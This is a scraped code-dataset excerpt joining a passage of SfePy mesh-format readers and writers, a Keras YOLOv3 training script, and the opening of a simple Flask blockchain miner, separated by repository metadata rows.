aux.append(int(row[2]))
el['3_4'].append(aux)
dim = 3
elif row[0] == 'CQUAD4':
aux = [int(ii)-1 for ii in row[3:]]
aux.append(int(row[2]))
el['2_4'].append(aux)
elif row[0] == 'CTRIA3':
aux = [int(ii)-1 for ii in row[3:]]
aux.append(int(row[2]))
el['2_3'].append(aux)
elif cmd == 'GRIDX':
cmd = ''
aux2 = row[1]
if aux2[-1] == '0':
aux2 = aux2[:-1]
aux3 = aux[1:]
aux3.append(aux2)
nod.append([float(ii) for ii in aux3]);
elif cmd == 'CHEXAX':
cmd = ''
aux4 = row[0]
aux5 = string.find(aux4, aux3)
aux.append(int(aux4[(aux5+len(aux3)):])-1)
aux.extend([int(ii)-1 for ii in row[1:]])
aux.append(aux2)
el['3_8'].append(aux)
dim = 3
elif row[0] == 'SPC' or row[0] == 'SPC*':
if node_grp is None:
node_grp = [0] * len(nod)
node_grp[int(row[2]) - 1] = int(row[1])
for elem in el.keys():
if len(el[elem]) > 0:
conns_in.append(el[elem])
descs.append(elem)
fd.close()
nod = nm.array(nod, nm.float64)
if dim == 2:
nod = nod[:,:2].copy()
conns, mat_ids = split_conns_mat_ids(conns_in)
mesh._set_io_data(nod, node_grp, conns, mat_ids, descs)
return mesh
@staticmethod
def format_str(str, idx, n=8):
out = ''
for ii, istr in enumerate(str):
aux = '%d' % istr
out += aux + ' ' * (n - len(aux))
if ii == 7:
out += '+%07d\n+%07d' % (idx, idx)
return out
def write(self, filename, mesh, out=None, **kwargs):
fd = open(filename, 'w')
coors, ngroups, conns, mat_ids, desc = mesh._get_io_data()
n_nod, dim = coors.shape
fd.write("$NASTRAN Bulk Data File created by SfePy\n")
fd.write("$\nBEGIN BULK\n")
fd.write("$\n$ ELEMENT CONNECTIVITY\n$\n")
iel = 0
mats = {}
for ig, conn in enumerate(conns):
ids = mat_ids[ig]
for ii in range(conn.shape[0]):
iel += 1
nn = conn[ii] + 1
mat = ids[ii]
if mat in mats:
mats[mat] += 1
else:
mats[mat] = 0
if (desc[ig] == "2_4"):
fd.write("CQUAD4 %s\n" %\
self.format_str([ii + 1, mat,
nn[0], nn[1], nn[2], nn[3]],
iel))
elif (desc[ig] == "2_3"):
fd.write("CTRIA3 %s\n" %\
self.format_str([ii + 1, mat,
nn[0], nn[1], nn[2]], iel))
elif (desc[ig] == "3_4"):
fd.write("CTETRA %s\n" %\
self.format_str([ii + 1, mat,
nn[0], nn[1], nn[2], nn[3]],
iel))
elif (desc[ig] == "3_8"):
fd.write("CHEXA %s\n" %\
self.format_str([ii + 1, mat, nn[0], nn[1], nn[2],
nn[3], nn[4], nn[5], nn[6],
nn[7]], iel))
else:
raise ValueError('unknown element type! (%s)' % desc[ig])
fd.write("$\n$ NODAL COORDINATES\n$\n")
format = 'GRID* %s % 08E % 08E\n'
if coors.shape[1] == 3:
format += '* % 08E0 \n'
else:
format += '* % 08E0 \n' % 0.0
for ii in range(n_nod):
sii = str(ii + 1)
fd.write(format % ((sii + ' ' * (8 - len(sii)),)
+ tuple(coors[ii])))
fd.write("$\n$ GEOMETRY\n$\n1 ")
fd.write("0.000000E+00 0.000000E+00\n")
fd.write("* 0.000000E+00 0.000000E+00\n* \n")
fd.write("$\n$ MATERIALS\n$\n")
matkeys = mats.keys()
matkeys.sort()
for ii, imat in enumerate(matkeys):
fd.write("$ material%d : Isotropic\n" % imat)
aux = str(imat)
fd.write("MAT1* %s " % (aux + ' ' * (8 - len(aux))))
fd.write("0.000000E+00 0.000000E+00\n")
fd.write("* 0.000000E+00 0.000000E+00\n")
fd.write("$\n$ GEOMETRY\n$\n")
for ii, imat in enumerate(matkeys):
fd.write("$ material%d : solid%d\n" % (imat, imat))
fd.write("PSOLID* %s\n" % self.format_str([ii + 1, imat], 0, 16))
fd.write("* \n")
fd.write("ENDDATA\n")
fd.close()
class NEUMeshIO(MeshIO):
format = 'gambit'
def read_dimension(self, ret_fd=False):
fd = open(self.filename, 'r')
row = fd.readline().split()
while 1:
if not row: break
if len(row) == 0: continue
if (row[0] == 'NUMNP'):
row = fd.readline().split()
n_nod, n_el, dim = row[0], row[1], int(row[4])
break;
if ret_fd:
return dim, fd
else:
fd.close()
return dim
def read(self, mesh, **kwargs):
el = {'3_8' : [], '3_4' : [], '2_4' : [], '2_3' : []}
nod = []
conns_in = []
descs = []
group_ids = []
group_n_els = []
groups = []
nodal_bcs = {}
fd = open(self.filename, 'r')
row = fd.readline()
while 1:
if not row: break
row = row.split()
if len(row) == 0:
row = fd.readline()
continue
if (row[0] == 'NUMNP'):
row = fd.readline().split()
n_nod, n_el, dim = int(row[0]), int(row[1]), int(row[4])
elif (row[0] == 'NODAL'):
row = fd.readline().split()
while not(row[0] == 'ENDOFSECTION'):
nod.append(row[1:])
row = fd.readline().split()
elif (row[0] == 'ELEMENTS/CELLS'):
row = fd.readline().split()
while not(row[0] == 'ENDOFSECTION'):
elid = [row[0]]
gtype = int(row[1])
if gtype == 6:
el['3_4'].append(row[3:]+elid)
elif gtype == 4:
rr = row[3:]
if (len(rr) < 8):
rr.extend(fd.readline().split())
el['3_8'].append(rr+elid)
elif gtype == 3:
el['2_3'].append(row[3:]+elid)
elif gtype == 2:
el['2_4'].append(row[3:]+elid)
row = fd.readline().split()
elif (row[0] == 'GROUP:'):
group_ids.append(row[1])
g_n_el = int(row[3])
group_n_els.append(g_n_el)
name = fd.readline().strip()
els = []
row = fd.readline().split()
row = fd.readline().split()
while not(row[0] == 'ENDOFSECTION'):
els.extend(row)
row = fd.readline().split()
if g_n_el != len(els):
                    msg = 'wrong number of group elements! (%d != %d)'\
                          % (g_n_el, len(els))
raise ValueError(msg)
groups.append(els)
elif (row[0] == 'BOUNDARY'):
row = fd.readline().split()
key = row[0]
num = int(row[2])
inod = read_array(fd, num, None, nm.int32) - 1
nodal_bcs[key] = inod.squeeze()
row = fd.readline().split()
assert_(row[0] == 'ENDOFSECTION')
row = fd.readline()
fd.close()
if int(n_el) != sum(group_n_els):
            print 'wrong total number of group elements! (%d != %d)'\
                  % (int(n_el), sum(group_n_els))
mat_ids = nm.zeros(n_el, dtype=nm.int32)
for ii, els in enumerate(groups):
els = nm.array(els, dtype=nm.int32)
mat_ids[els - 1] = group_ids[ii]
for elem in el.keys():
if len(el[elem]) > 0:
els = nm.array(el[elem], dtype=nm.int32)
els[:, :-1] -= 1
els[:, -1] = mat_ids[els[:, -1]-1]
if elem == '3_8':
els = els[:, [0, 1, 3, 2, 4, 5, 7, 6, 8]]
conns_in.append(els)
descs.append(elem)
nod = nm.array(nod, nm.float64)
conns, mat_ids = split_conns_mat_ids(conns_in)
mesh._set_io_data(nod, None, conns, mat_ids, descs, nodal_bcs=nodal_bcs)
return mesh
def write(self, filename, mesh, out=None, **kwargs):
raise NotImplementedError
class ANSYSCDBMeshIO(MeshIO):
format = 'ansys_cdb'
@staticmethod
def guess(filename):
fd = open(filename, 'r')
for ii in xrange(1000):
row = fd.readline()
if not row: break
if len(row) == 0: continue
row = row.split(',')
kw = row[0].lower()
if (kw == 'nblock'):
ok = True
break
else:
ok = False
fd.close()
return ok
@staticmethod
def make_format(format):
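        # Turn an ANSYS fixed-width format specification (already split on
        # commas, e.g. ['3i9', '6e21.13e3']) into per-column (start, end)
        # character slices plus their type codes; '3i9' gives three 9-character
        # integer fields, '6e21.13e3' six 21-character float fields.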
idx = [];
dtype = [];
start = 0;
for iform in format:
ret = iform.partition('i')
if not ret[1]:
ret = iform.partition('e')
if not ret[1]:
raise ValueError
aux = ret[2].partition('.')
step = int(aux[0])
for j in range(int(ret[0])):
idx.append((start, start+step))
start += step
dtype.append(ret[1])
return idx, dtype
def write(self, filename, mesh, out=None, **kwargs):
raise NotImplementedError
def read_bounding_box(self):
raise NotImplementedError
def read_dimension(self, ret_fd=False):
return 3
def read(self, mesh, **kwargs):
ids = []
coors = []
tetras = []
hexas = []
qtetras = []
qhexas = []
nodal_bcs = {}
fd = open(self.filename, 'r')
while True:
row = fd.readline()
if not row: break
if len(row) == 0: continue
row = row.split(',')
kw = row[0].lower()
if (kw == 'nblock'):
# Solid keyword -> 3, otherwise 1 is the starting coors index.
ic = 3 if len(row) == 3 else 1
fmt = fd.readline()
fmt = fmt.strip()[1:-1].split(',')
idx, dtype = self.make_format(fmt)
ii0, ii1 = idx[0]
while True:
row = fd.readline()
if (row[0] == '!') or (row[:2] == '-1'):
break
line = [float(row[i0:i1]) for i0, i1 in idx[ic:]]
ids.append(int(row[ii0:ii1]))
coors.append(line)
elif (kw == 'eblock'):
if (len(row) <= 2) or row[2] != 'solid': # no solid keyword
continue
fmt = fd.readline()
fmt = [fmt.strip()[1:-1]]
idx, dtype = self.make_format(fmt)
imi0, imi1 = idx[0] # Material id.
inn0, inn1 = idx[8] # Number of nodes in line.
ien0, ien1 = idx[10] # Element number.
ic0 = 11
while True:
row = fd.readline()
if (row[0] == '!') or (row[:2] == '-1'):
break
line = [int(row[imi0:imi1])]
n_nod = int(row[inn0:inn1])
line.extend(int(row[i0:i1])
for i0, i1 in idx[ic0 : ic0 + n_nod])
if n_nod == 4:
tetras.append(line)
elif n_nod == 8:
hexas.append(line)
elif n_nod == 10:
row = fd.readline()
line.extend(int(row[i0:i1])
for i0, i1 in idx[:2])
qtetras.append(line)
elif n_nod == 20:
row = fd.readline()
line.extend(int(row[i0:i1])
for i0, i1 in idx[:12])
qhexas.append(line)
else:
raise ValueError('unsupported element type! (%d nodes)'
% n_nod)
elif kw == 'cmblock':
if row[2].lower() != 'node': # Only node sets support.
continue
n_nod = int(row[3])
fd.readline() # Format line not needed.
nods = read_array(fd, n_nod, 1, nm.int32)
nodal_bcs[row[1].strip()] = nods.ravel()
fd.close()
coors = nm.array(coors, dtype=nm.float64)
tetras = nm.array(tetras, dtype=nm.int32)
if len(tetras):
mat_ids_tetras = tetras[:, 0]
tetras = tetras[:, 1:]
else:
mat_ids_tetras = nm.array([])
hexas = nm.array(hexas, dtype=nm.int32)
if len(hexas):
mat_ids_hexas = hexas[:, 0]
hexas = hexas[:, 1:]
else:
mat_ids_hexas = nm.array([])
if len(qtetras):
qtetras = nm.array(qtetras, dtype=nm.int32)
tetras.shape = (max(0, tetras.shape[0]), 4)
tetras = nm.r_[tetras, qtetras[:, 1:5]]
mat_ids_tetras = nm.r_[mat_ids_tetras, qtetras[:, 0]]
if len(qhexas):
qhexas = nm.array(qhexas, dtype=nm.int32)
hexas.shape = (max(0, hexas.shape[0]), 8)
hexas = nm.r_[hexas, qhexas[:, 1:9]]
mat_ids_hexas = nm.r_[mat_ids_hexas, qhexas[:, 0]]
if len(qtetras) or len(qhexas):
ii = nm.union1d(tetras.ravel(), hexas.ravel())
n_nod = len(ii)
remap = nm.zeros((ii.max()+1,), dtype=nm.int32)
remap[ii] = nm.arange(n_nod, dtype=nm.int32)
ic = nm.searchsorted(ids, ii)
coors = coors[ic]
else:
n_nod = coors.shape[0]
remap = nm.zeros((nm.array(ids).max() + 1,), dtype=nm.int32)
remap[ids] = nm.arange(n_nod, dtype=nm.int32)
ngroups = nm.zeros(len(coors), dtype=nm.int32)
mesh = mesh_from_groups(mesh, ids, coors, ngroups,
[], [], [], [],
tetras, mat_ids_tetras,
hexas, mat_ids_hexas, remap=remap)
mesh.nodal_bcs = {}
for key, nods in nodal_bcs.iteritems():
mesh.nodal_bcs[key] = remap[nods]
return mesh
class Msh2MeshIO(MeshIO):
format = 'msh_v2'
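    # Gmsh MSH2 element type codes mapped to (dimension, nodes per cell):
    # 1 = 2-node line, 2 = 3-node triangle, 3 = 4-node quadrangle,
    # 4 = 4-node tetrahedron, 5 = 8-node hexahedron, 6 = 6-node prism.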
msh_cells = {
1: (2, 2),
2: (2, 3),
3: (2, 4),
4: (3, 4),
5: (3, 8),
6: (3, 6),
}
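    # Node permutation that turns a 6-node prism (wedge) into a degenerate
    # 8-node hexahedron by repeating its third and sixth nodes.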
prism2hexa = nm.asarray([0, 1, 2, 2, 3, 4, 5, 5])
def read_dimension(self, ret_fd=True):
fd = open(self.filename, 'r')
while 1:
lastpos = fd.tell()
line = skip_read_line(fd).split()
if line[0] in ['$Nodes', '$Elements']:
num = int(read_token(fd))
coors = read_array(fd, num, 4, nm.float64)
fd.seek(lastpos)
if nm.sum(nm.abs(coors[:,3])) < 1e-16:
dims = 2
else:
dims = 3
break
if line[0] == '$PhysicalNames':
num = int(read_token(fd))
dims = []
for ii in range(num):
dims.append(int(skip_read_line(fd, no_eof=True).split()[0]))
break
dim = nm.max(dims)
if ret_fd:
return dim, fd
else:
fd.close()
return dim
def read_bounding_box(self, ret_fd=False, ret_dim=False):
fd = open(self.filename, 'r')
dim, fd = self.read_dimension(ret_fd=True)
return _read_bounding_box(fd, dim, '$Nodes',
c0=1, ret_fd=ret_fd, ret_dim=ret_dim)
def read(self, mesh, omit_facets=True, **kwargs):
fd = open(self.filename, 'r')
conns = []
descs = []
mat_ids = []
tags = []
dims = []
while 1:
line = skip_read_line(fd).split()
if not line:
break
ls = line[0]
if ls == '$MeshFormat':
skip_read_line(fd)
elif ls == '$PhysicalNames':
num = int(read_token(fd))
for ii in range(num):
skip_read_line(fd)
elif ls == '$Nodes':
num = int(read_token(fd))
coors = read_array(fd, num, 4, nm.float64)
elif ls == '$Elements':
num = int(read_token(fd))
for ii in range(num):
line = [int(jj) for jj in skip_read_line(fd).split()]
if line[1] > 6:
continue
dimension, nc = self.msh_cells[line[1]]
dims.append(dimension)
ntag = line[2]
mat_id = line[3]
conn = line[(3 + ntag):]
desc = '%d_%d' % (dimension, nc)
if desc in descs:
idx = descs.index(desc)
conns[idx].append(conn)
mat_ids[idx].append(mat_id)
tags[idx].append(line[3:(3 + ntag)])
else:
descs.append(desc)
conns.append([conn])
mat_ids.append([mat_id])
tags.append(line[3:(3 + ntag)])
elif ls == '$Periodic':
periodic = ''
while 1:
pline = skip_read_line(fd)
if '$EndPeriodic' in pline:
break
else:
periodic += pline
elif line[0] == '#' or ls[:4] == '$End':
pass
else:
output('skipping unknown entity: %s' % line)
continue
fd.close()
dim = nm.max(dims)
if '3_6' in descs:
idx6 = descs.index('3_6')
c3_6as8 = nm.asarray(conns[idx6],
dtype=nm.int32)[:,self.prism2hexa]
if '3_8' in descs:
descs.pop(idx6)
                c3_6m = nm.asarray(mat_ids.pop(idx6), dtype=nm.int32)
                idx8 = descs.index('3_8')
                c3_8 = nm.asarray(conns[idx8], dtype=nm.int32)
                c3_8m = nm.asarray(mat_ids[idx8], dtype=nm.int32)
conns[idx8] = nm.vstack([c3_8, c3_6as8])
mat_ids[idx8] = nm.hstack([c3_8m, c3_6m])
else:
descs[idx6] = '3_8'
conns[idx6] = c3_6as8
descs0, mat_ids0, conns0 = [], [], []
for ii in range(len(descs)):
if int(descs[ii][0]) == dim:
conns0.append(nm.asarray(conns[ii], dtype=nm.int32) - 1)
mat_ids0.append(nm.asarray(mat_ids[ii], dtype=nm.int32))
descs0.append(descs[ii])
mesh._set_io_data(coors[:,1:], nm.int32(coors[:,-1] * 0),
conns0, mat_ids0, descs0)
return mesh
def guess_format(filename, ext, formats, io_table):
"""
Guess the format of filename, candidates are in formats.
"""
ok = False
for format in formats:
output('guessing %s' % format)
try:
ok = io_table[format].guess(filename)
except AttributeError:
pass
if ok: break
else:
raise NotImplementedError('cannot guess format of a *%s file!' % ext)
return format
var_dict = vars().items()
io_table = {}
for key, var in var_dict:
try:
if is_derived_class(var, MeshIO):
io_table[var.format] = var
except TypeError:
pass
del var_dict
def any_from_filename(filename, prefix_dir=None):
"""
Create a MeshIO instance according to the kind of `filename`.
Parameters
----------
filename : str, function or MeshIO subclass instance
The name of the mesh file. It can be also a user-supplied function
accepting two arguments: `mesh`, `mode`, where `mesh` is a Mesh
instance and `mode` is one of 'read','write', or a MeshIO subclass
instance.
prefix_dir : str
The directory name to prepend to `filename`.
Returns
-------
io : MeshIO subclass instance
The MeshIO subclass instance corresponding to the kind of `filename`.
"""
if not isinstance(filename, basestr):
if isinstance(filename, MeshIO):
return filename
else:
return UserMeshIO(filename)
ext = op.splitext(filename)[1].lower()
try:
format = supported_formats[ext]
except KeyError:
raise ValueError('unsupported mesh file suffix! (%s)' % ext)
if isinstance(format, tuple):
format = guess_format(filename, ext, format, io_table)
if prefix_dir is not None:
filename = op.normpath(op.join(prefix_dir, filename))
return io_table[format](filename)
insert_static_method(MeshIO, any_from_filename)
del any_from_filename
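# A minimal sketch of creating a MeshIO instance from a file name (illustration
# only; 'cube.mesh' is a placeholder that must exist and have a supported
# suffix):
def _example_any_from_filename(filename='cube.mesh'):
    io = MeshIO.any_from_filename(filename)
    return io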
def for_format(filename, format=None, writable=False, prefix_dir=None):
"""
Create a MeshIO instance for file `filename` with forced `format`.
Parameters
----------
filename : str
The name of the mesh file.
format : str
One of supported formats. If None,
:func:`MeshIO.any_from_filename()` is called instead.
writable : bool
If True, verify that the mesh format is writable.
prefix_dir : str
The directory name to prepend to `filename`.
Returns
-------
io : MeshIO subclass instance
The MeshIO subclass instance corresponding to the `format`.
"""
ext = op.splitext(filename)[1].lower()
try:
_format = supported_formats[ext]
except KeyError:
_format = None
format = get_default(format, _format)
if format is None:
io = MeshIO.any_from_filename(filename, prefix_dir=prefix_dir)
else:
if not isinstance(format, basestr):
raise ValueError('ambigous suffix! (%s -> %s)' % (ext, format))
if format not in io_table:
raise ValueError('unknown output mesh format! (%s)' % format)
if writable and ('w' not in supported_capabilities[format]):
output_writable_meshes()
msg = 'write support not implemented for output mesh format "%s",' \
' see above!' % format
raise ValueError(msg)
if prefix_dir is not None:
filename = op.normpath(op.join(prefix_dir, filename))
io = io_table[format](filename)
return io
insert_static_method(MeshIO, for_format)
del for_format
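# A minimal sketch of forcing a particular output format (illustration only;
# the file name is a placeholder and 'hdf5' assumes pytables is available):
def _example_for_format(filename='results.h5'):
    io = MeshIO.for_format(filename, format='hdf5')
    return io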
| 32.187303
| 80
| 0.459331
|
c457502a4764c959ed4aa6b4bb79091323d01308
| 9,458
|
py
|
Python
|
train.py
|
17702513221/keras-yolov3
|
b0314c031812de29ceea89bd56c9da342f5c96c6
|
[
"MIT"
] | 3
|
2019-06-24T12:23:26.000Z
|
2020-04-04T09:09:17.000Z
|
train.py
|
17702513221/keras-yolov3
|
b0314c031812de29ceea89bd56c9da342f5c96c6
|
[
"MIT"
] | null | null | null |
train.py
|
17702513221/keras-yolov3
|
b0314c031812de29ceea89bd56c9da342f5c96c6
|
[
"MIT"
] | null | null | null |
"""
Retrain the YOLO model for your own dataset.
"""
import numpy as np
import keras.backend as K
from keras.layers import Input, Lambda
from keras.models import Model
from keras.optimizers import Adam
from keras.callbacks import TensorBoard, ModelCheckpoint, ReduceLROnPlateau, EarlyStopping
from yolo3.model import preprocess_true_boxes, yolo_body, tiny_yolo_body, yolo_loss
# get_random_data (imported below) processes the annotation lines and caps the number of boxes per image at 20 (which also makes batch concatenation easier; the details are explained later).
# It performs data augmentation: any preprocessing that fights overfitting (shifting, scaling, flipping, color jitter, ...) counts as augmentation, and it also effectively enlarges the dataset.
from yolo3.utils import get_random_data
def _main():
annotation_path = 'train.txt'
log_dir = 'logs/000/'
classes_path = 'model_data/voc_classes.txt'
anchors_path = 'model_data/yolo_anchors.txt'
class_names = get_classes(classes_path)
num_classes = len(class_names)
anchors = get_anchors(anchors_path)
input_shape = (416,416) # multiple of 32, hw
is_tiny_version = len(anchors)==6 # default setting
if is_tiny_version:
model = create_tiny_model(input_shape, anchors, num_classes,
freeze_body=2, weights_path='model_data/tiny_yolo_weights.h5')
else:
model = create_model(input_shape, anchors, num_classes,
freeze_body=2, weights_path='model_data/yolo_weights.h5') # make sure you know what you freeze
    # This callback writes TensorBoard logs so training/validation metrics and layer activation histograms can be monitored during training.
logging = TensorBoard(log_dir=log_dir)
    # This callback saves the model weights to filepath (here every 3 epochs, keeping only the best by val_loss).
checkpoint = ModelCheckpoint(log_dir + 'ep{epoch:03d}-loss{loss:.3f}-val_loss{val_loss:.3f}.h5',
monitor='val_loss', save_weights_only=True, save_best_only=True, period=3)
    # Reduce the learning rate when the monitored metric has stopped improving.
reduce_lr = ReduceLROnPlateau(monitor='val_loss', factor=0.1, patience=3, verbose=1)
    # Stop training early when the monitored metric has stopped improving.
early_stopping = EarlyStopping(monitor='val_loss', min_delta=0, patience=10, verbose=1)
val_split = 0.1
with open(annotation_path) as f:
lines = f.readlines()
np.random.seed(10101)
    np.random.shuffle(lines)  # shuffle the annotation lines
np.random.seed(None)
num_val = int(len(lines)*val_split)
    num_train = len(lines) - num_val  # hold out 10% of the data as a validation set
# Train with frozen layers first, to get a stable loss.
# Adjust num epochs to your dataset. This step is enough to obtain a not bad model.
if True:
model.compile(optimizer=Adam(lr=1e-3), loss={
# use custom yolo_loss Lambda layer.
'yolo_loss': lambda y_true, y_pred: y_pred})
batch_size = 32
print('Train on {} samples, val on {} samples, with batch size {}.'.format(num_train, num_val, batch_size))
model.fit_generator(data_generator_wrapper(lines[:num_train], batch_size, input_shape, anchors, num_classes),
steps_per_epoch=max(1, num_train//batch_size),
validation_data=data_generator_wrapper(lines[num_train:], batch_size, input_shape, anchors, num_classes),
validation_steps=max(1, num_val//batch_size),
epochs=50,
initial_epoch=0,
                callbacks=[logging, checkpoint])  # start training
model.save_weights(log_dir + 'trained_weights_stage_1.h5')
# Unfreeze and continue training, to fine-tune.
# Train longer if the result is not good.
if True:
for i in range(len(model.layers)):
            model.layers[i].trainable = True  # unfreeze every layer so that all weights can be trained
model.compile(optimizer=Adam(lr=1e-4), loss={'yolo_loss': lambda y_true, y_pred: y_pred}) # recompile to apply the change
print('Unfreeze all of the layers.')
batch_size = 32 # note that more GPU memory is required after unfreezing the body
print('Train on {} samples, val on {} samples, with batch size {}.'.format(num_train, num_val, batch_size))
model.fit_generator(data_generator_wrapper(lines[:num_train], batch_size, input_shape, anchors, num_classes),
                steps_per_epoch=max(1, num_train//batch_size),  # number of batches per epoch
validation_data=data_generator_wrapper(lines[num_train:], batch_size, input_shape, anchors, num_classes),
validation_steps=max(1, num_val//batch_size),
epochs=100,
initial_epoch=50,
callbacks=[logging, checkpoint, reduce_lr, early_stopping])
model.save_weights(log_dir + 'trained_weights_final.h5')
# Further training if needed.
def get_classes(classes_path):
'''loads the classes'''
with open(classes_path) as f:
class_names = f.readlines()
class_names = [c.strip() for c in class_names]
return class_names
def get_anchors(anchors_path):
'''loads the anchors from a file'''
with open(anchors_path) as f:
anchors = f.readline()
anchors = [float(x) for x in anchors.split(',')]
return np.array(anchors).reshape(-1, 2)
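# Example of the expected anchors file content: a single line of comma-separated
# width,height values. The numbers below are the default COCO anchors shipped
# with keras-yolo3 and are shown only as an illustration; get_anchors() turns
# them into a (9, 2) array of (width, height) pairs.
#
#   10,13, 16,30, 33,23, 30,61, 62,45, 59,119, 116,90, 156,198, 373,326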
def create_model(input_shape, anchors, num_classes, load_pretrained=True, freeze_body=2,
weights_path='model_data/yolo_weights.h5'):
'''create the training model'''
K.clear_session() # get a new session
image_input = Input(shape=(None, None, 3))
h, w = input_shape
num_anchors = len(anchors)
y_true = [Input(shape=(h//{0:32, 1:16, 2:8}[l], w//{0:32, 1:16, 2:8}[l], \
        num_anchors//3, num_classes+5)) for l in range(3)]  # three detection scales
    # e.g. [(13, 13, 3, 6), (26, 26, 3, 6), (52, 52, 3, 6)] for a single class:
    # 13/26/52 are the grid sizes, 3 is the number of anchors per scale, and 6 = 4 box coordinates + 1 objectness score + 1 class.
model_body = yolo_body(image_input, num_anchors//3, num_classes)
print('Create YOLOv3 model with {} anchors and {} classes.'.format(num_anchors, num_classes))
    if load_pretrained:  # load the pretrained weights
model_body.load_weights(weights_path, by_name=True, skip_mismatch=True)
print('Load weights {}.'.format(weights_path))
if freeze_body in [1, 2]:
# Freeze darknet53 body or freeze all but 3 output layers.
        num = (185, len(model_body.layers)-3)[freeze_body-1]  # freeze the first 185 layers, or all but the last 3 layers
for i in range(num): model_body.layers[i].trainable = False
print('Freeze the first {} layers of total {} layers.'.format(num, len(model_body.layers)))
model_loss = Lambda(yolo_loss, output_shape=(1,), name='yolo_loss',
arguments={'anchors': anchors, 'num_classes': num_classes, 'ignore_thresh': 0.5})(
[*model_body.output, *y_true])
    # ignore_thresh: IoU threshold
    # model_body.output = [y1, y2, y3], the predictions at the three scales; each y has shape m * grid * grid * num_anchors * (num_classes + 5)
    # m = batch_size
    model = Model([model_body.input, *y_true], model_loss)
    # data_generator yields one batch of images and labels; the images are fed through yolo_body (model_body) and the outputs are combined with y_true to compute the loss
return model
def create_tiny_model(input_shape, anchors, num_classes, load_pretrained=True, freeze_body=2,
weights_path='model_data/tiny_yolo_weights.h5'):
'''create the training model, for Tiny YOLOv3'''
K.clear_session() # get a new session
image_input = Input(shape=(None, None, 3))
h, w = input_shape
num_anchors = len(anchors)
y_true = [Input(shape=(h//{0:32, 1:16}[l], w//{0:32, 1:16}[l], \
num_anchors//2, num_classes+5)) for l in range(2)]
model_body = tiny_yolo_body(image_input, num_anchors//2, num_classes)
print('Create Tiny YOLOv3 model with {} anchors and {} classes.'.format(num_anchors, num_classes))
if load_pretrained:
model_body.load_weights(weights_path, by_name=True, skip_mismatch=True)
print('Load weights {}.'.format(weights_path))
if freeze_body in [1, 2]:
# Freeze the darknet body or freeze all but 2 output layers.
num = (20, len(model_body.layers)-2)[freeze_body-1]
for i in range(num): model_body.layers[i].trainable = False
print('Freeze the first {} layers of total {} layers.'.format(num, len(model_body.layers)))
model_loss = Lambda(yolo_loss, output_shape=(1,), name='yolo_loss',
arguments={'anchors': anchors, 'num_classes': num_classes, 'ignore_thresh': 0.7})(
[*model_body.output, *y_true])
model = Model([model_body.input, *y_true], model_loss)
return model
# data_generator reads batch_size annotation lines at a time, shuffles them, feeds each one to get_random_data,
# converts the resulting images and boxes to numpy arrays, and passes the boxes to preprocess_true_boxes.
# The yielded [image_data, *y_true] is the model input for one batch; np.zeros(batch_size) is the dummy loss target.
def data_generator(annotation_lines, batch_size, input_shape, anchors, num_classes):
'''data generator for fit_generator'''
n = len(annotation_lines)
i = 0
    while True:  # must loop forever for fit_generator
image_data = []
box_data = []
for b in range(batch_size):
if i==0:
                np.random.shuffle(annotation_lines)  # shuffle the images
            image, box = get_random_data(annotation_lines[i], input_shape, random=True)  # augment each image and split it into image data and box labels
image_data.append(image)
box_data.append(box)
            i = (i+1) % n  # reshuffle once every image has been yielded
        image_data = np.array(image_data)  # stack the images into an array
        box_data = np.array(box_data)  # stack the bounding boxes into an array
        # preprocess_true_boxes stores each box with its matched anchor, objectness and class information in y_true, i.e. it builds the training labels.
        y_true = preprocess_true_boxes(box_data, input_shape, anchors, num_classes)  # convert the ground-truth boxes into the YOLO target format
yield [image_data, *y_true], np.zeros(batch_size)
# Checks that the annotation list is non-empty and the batch size is positive, then delegates to data_generator.
def data_generator_wrapper(annotation_lines, batch_size, input_shape, anchors, num_classes):
n = len(annotation_lines)
if n==0 or batch_size<=0: return None
return data_generator(annotation_lines, batch_size, input_shape, anchors, num_classes)
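# A minimal sketch of pulling a single batch from the generator (illustration
# only; it assumes the default 'train.txt', anchors and class files used by
# _main() exist on disk):
def _example_one_batch(batch_size=2, input_shape=(416, 416)):
    anchors = get_anchors('model_data/yolo_anchors.txt')
    num_classes = len(get_classes('model_data/voc_classes.txt'))
    with open('train.txt') as f:
        lines = f.readlines()
    gen = data_generator_wrapper(lines, batch_size, input_shape, anchors, num_classes)
    inputs, dummy_loss = next(gen)
    image_data, y_true = inputs[0], inputs[1:]
    return image_data.shape, [y.shape for y in y_true]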
if __name__ == '__main__':
_main()
| 45.912621
| 129
| 0.692641
|
9278516b50f4026a0be7509f7d8afa6699f92ca7
| 8,919
|
py
|
Python
|
src/miner/miner.py
|
nullart/oicoin
|
26f997cf15239ffa03011b387fc45ca6a8a199f4
|
[
"MIT"
] | null | null | null |
src/miner/miner.py
|
nullart/oicoin
|
26f997cf15239ffa03011b387fc45ca6a8a199f4
|
[
"MIT"
] | null | null | null |
src/miner/miner.py
|
nullart/oicoin
|
26f997cf15239ffa03011b387fc45ca6a8a199f4
|
[
"MIT"
] | null | null | null |
import time
import hashlib as hasher
import json
import requests
import base64
from flask import Flask
from flask import request
from multiprocessing import Process, Pipe
import ecdsa
from miner_config import MINER_ADDRESS, MINER_NODE_URL, PEER_NODES
node = Flask(__name__)
class Block:
def __init__(self, index, timestamp, data, previous_hash):
"""Return a new Block object. Each block is "chained" to its previous
by calling its unique hash.
Args:
index (int): Block number.
timestamp (int): Block creation timestamp.
data (str): Data to be sent.
previous_hash(str): String representing previous block unique hash.
Attrib:
index (int): Block number.
timestamp (int): Block creation timestamp.
data (str): Data to be sent.
previous_hash(str): String representing previous block unique hash.
hash(str): Current block unique hash.
"""
self.index = index
self.timestamp = timestamp
self.data = data
self.previous_hash = previous_hash
self.hash = self.hash_block()
def hash_block(self):
# Creates the unique hash for the block. It uses sha256.
sha = hasher.sha256()
sha.update((str(self.index) + str(self.timestamp) + str(self.data) + str(self.previous_hash)).encode('utf-8'))
return sha.hexdigest()
def create_genesis_block():
#To create each block, it needs the hash of the previous one. First block has no previous, so it must be created manually (with index zero and arbitrary previous hash)
return Block(0, time.time(), {"proof-of-work": 9, "transactions": None}, "0")
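# A minimal sketch of how blocks chain together (illustration only; the proof
# and transaction values are placeholders): each block stores the hash of its
# parent, so changing the parent changes its hash and breaks the link.
def _example_chain_two_blocks():
    genesis = create_genesis_block()
    child = Block(1, time.time(), {"proof-of-work": 71271, "transactions": []},
                  genesis.hash)
    return child.previous_hash == genesis.hash  # True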
BLOCKCHAIN = []
BLOCKCHAIN.append(create_genesis_block())
NODE_PENDING_TRANSACTIONS = []
def proof_of_work(last_proof,blockchain):
# Create a variable that we will use to find our next proof of work
incrementor = last_proof + 1
# Get start time
start_time = time.time()
